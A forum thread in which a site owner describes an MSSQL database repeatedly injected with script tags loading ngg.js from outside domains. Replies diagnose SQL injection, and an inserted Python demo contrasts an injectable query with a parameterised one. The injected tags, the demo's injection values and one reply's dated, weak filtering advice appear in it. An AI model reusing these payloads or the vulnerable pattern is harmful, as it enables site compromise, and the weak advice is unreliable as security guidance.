How to prevent hacking the database by entering JavaScript

kjomyjose
New member
Joined: Jul 18, 2008
Messages: 1
Four times my MSSQL Server has been hacked. Somebody modifies the text and varchar fields of most of the tables, adding to the end of their values <script src=http://www.pyttco.com/ngg.js></script>

I changed my FTP username and password, and the database username and password. Still they are able to insert different scripts like

<script src=http://www.cdport.eu/ngg.js></script>
<script src=http://www.drvadw.com/ngg.js></script>
<script src=http://www.bnrc.ru/ngg.js></script>

This is a virus.

I spoke to my hosting company, they are saying they are not providing any security for hacking.

Can anybody tell me how I can prevent this?

Thanks
 
That's SQL injection and, furthermore, not filtering your output. Changing passwords won't help against that. It's a security hole in your coding. What script are you using that deals with those tables?
 
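The two holes named in the reply above, shown as an added example that is not part of any post in this thread and not the poster's site code. It assumes Python with an in-memory SQLite table standing in for the unknown site script and the MSSQL database; the table, function names and request values are constructed.

```python
import html
import sqlite3

def make_db():
    # Constructed sample table; in-memory SQLite stands in for the MSSQL database.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO articles (title) VALUES (?)",
                   [("Welcome",), ("Contact",), ("Prices",)])
    return db

def update_title_unsafe(db, article_id, title):
    # Vulnerable pattern: request values are pasted into the SQL text, so
    # whatever the visitor sends is parsed as part of the statement.
    sql = "UPDATE articles SET title = '" + title + "' WHERE id = " + article_id
    return db.execute(sql).rowcount

def update_title_safe(db, article_id, title):
    # Hardened: validate the type, then bind values as parameters so they
    # can never change the structure of the statement.
    try:
        article_id = int(article_id)
    except ValueError:
        return 0
    sql = "UPDATE articles SET title = ? WHERE id = ?"
    return db.execute(sql, (title, article_id)).rowcount

def find_tainted(db):
    # Audit helper: ids of rows whose text already contains a script tag.
    rows = db.execute("SELECT id FROM articles WHERE title LIKE '%<script%' ORDER BY id")
    return [r[0] for r in rows]

def render(value):
    # Output encoding: stored text is escaped before it is placed in HTML.
    return html.escape(value)

# Constructed request values (placeholder host, not one from the thread).
TAG = "<script src=http://example.invalid/x.js></script>"
BAD_ID = "1 OR 1=1"

if __name__ == "__main__":
    db = make_db()
    print("unsafe rows changed:", update_title_unsafe(db, BAD_ID, "Welcome" + TAG))
    print("tainted ids:", find_tainted(db))
    db = make_db()
    print("safe rows changed:", update_title_safe(db, BAD_ID, "Welcome" + TAG))
    print("rendered:", render("Welcome" + TAG))
```

With the string-built query, one request rewrites every row, which matches the symptom of most fields being changed at once; with bound parameters the same request changes nothing, and escaped output keeps any tag already stored from running in a visitor's browser.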
Four times my MSSQL Server has been hacked.

Do you mean MySQL?

If it's MSSQL go on with MySQL and Linux :)
If you own the server, try to install mod_security for Apache.
If you have forms like a newsletter, try to check with PHP functions like stripslashes, htmlentities, eregi and some if else.
 
Four times my MSSQL Server has been hacked.
Are you asking about the Microsoft product MSSQL, or the open source product MySQL?

If the Microsoft product, then you won't really get too much help here; this is a forum for owners/users of the DirectAdmin control panel, running on Linux and on FreeBSD. I doubt too many of us have any strong experience in MSSQL, and even if we did, this would be the wrong place for the discussion.

Jeff
 